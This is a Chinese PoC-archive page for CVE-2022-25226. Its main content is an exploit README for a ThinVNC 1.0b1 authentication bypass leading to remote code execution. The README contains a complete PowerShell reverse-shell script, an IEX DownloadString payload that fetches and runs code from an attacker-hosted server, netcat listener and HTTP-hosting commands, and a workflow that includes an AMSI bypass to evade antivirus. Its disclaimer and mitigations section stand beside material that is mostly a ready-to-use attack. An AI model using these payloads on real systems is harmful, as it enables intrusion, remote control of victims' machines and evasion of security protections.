关联漏洞
标题:
ThinVNC 安全漏洞
(CVE-2022-25226)
描述:ThinVNC是一款基于HTML5和AJAX的远程桌面实现。 ThinVNC 1.0b1版本存在安全漏洞,该漏洞源于应用缺少身份验证。未经身份验证的攻击者通过“http://thin-vnc:8080/cmd?cmd=connect”绕过身份验证过程,无需任何身份验证即可获得有效的 SID,还可以通过向服务器发送键盘或鼠标事件利用该漏洞实现服务器上的代码执行。
描述
ThinVNC 1.0b1 - Authentication Bypass to RCE
介绍
# ThinVNC 1.0b1 - Authentication Bypass to Remote Code Execution (CVE-2022-25226)
**Author:** krill-x7
**Reference:** https://fluidattacks.com/advisories/sinatra
---
## Overview
ThinVNC 1.0b1 contains an authentication bypass vulnerability (CVE-2022-25226) allowing remote attackers to interact with the backend unauthenticated. By leveraging exposed `/cmd` endpoints, attackers can simulate keystrokes, open PowerShell, bypass AMSI, and execute arbitrary commands—ultimately leading to Remote Code Execution (RCE).
This script chains those primitives to gain a reverse shell on the target system.
---
## Disclaimer
This code is provided **for educational purposes only**.
Use it **only on systems you own or are explicitly authorized to test**.
---
## Requirements
- Python 3
- `rev.ps1` reverse shell script hosted on your attacker machine
- A listener (e.g., Netcat) to catch the shell
---
## Usage
```bash
python3 thinvnc_rce.py -t <TARGET_IP> -tp <TARGET_PORT> -a <ATTACKER_IP> -ap <ATTACKER_PORT>
```
---
## Example
```bash
python3 thinvnc_rce.py -t 192.168.1.100 -tp 8080 -a 192.168.1.200 -ap 8000
```
---
## Payload Setup
### 1. Create `rev.ps1`
Save this to a file called `rev.ps1`.
**Important:** Replace `192.168.1.200` and `8000` with your attacker's IP and listening port.
```powershell
$client = New-Object System.Net.Sockets.TCPClient("192.168.1.200",8000);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
}
$client.Close()
```
---
### 2. Host `rev.ps1`
From the same directory:
```bash
python3 -m http.server 8000
```
---
### 3. Start a Listener
```bash
nc -lvnp 8000
```
---
## Exploit Workflow
1. Get a valid SID using unauthenticated request to `/cmd?cmd=connect`.
2. Start that SID with keyboard/mouse access via `/cmd?cmd=start`.
3. Send `Ctrl+Esc` key combo to open the Start menu.
4. Launch PowerShell in bypass mode.
5. Bypass AMSI to disable PowerShell protections.
6. Execute the reverse shell payload from your HTTP server.
---
## Payload Execution
This is the payload that gets executed in memory:
```powershell
IEX((New-Object System.Net.WebClient).DownloadString('http://<ATTACKER_IP>:<PORT>/rev.ps1'))
```
Replace `<ATTACKER_IP>` and `<PORT>` with your actual IP and port.
---
## Notes
- The payload is executed using clipboard-based command injection.
- AMSI bypass is included to evade PowerShell-based AV detections.
- ThinVNC runs PowerShell with default user permissions—if running as admin, shell is elevated.
---
## Mitigations
- Do not expose ThinVNC to the internet.
- Block `/cmd` endpoint via web server config or WAF.
- Switch to supported, secure alternatives (e.g., Apache Guacamole).
- Monitor PowerShell usage and clipboard injection behavior.
---
## Credits
- Exploit and automation: **krill-x7**
- Vulnerability discovery and advisory: [Fluid Attacks – Advisory Sinatra](https://fluidattacks.com/advisories/sinatra)
文件快照
[4.0K] /data/pocs/5a86ff4e1b25bc60d751f75cec20df38e00f7b00
├── [4.3K] cve-2022-25226.py
└── [3.2K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。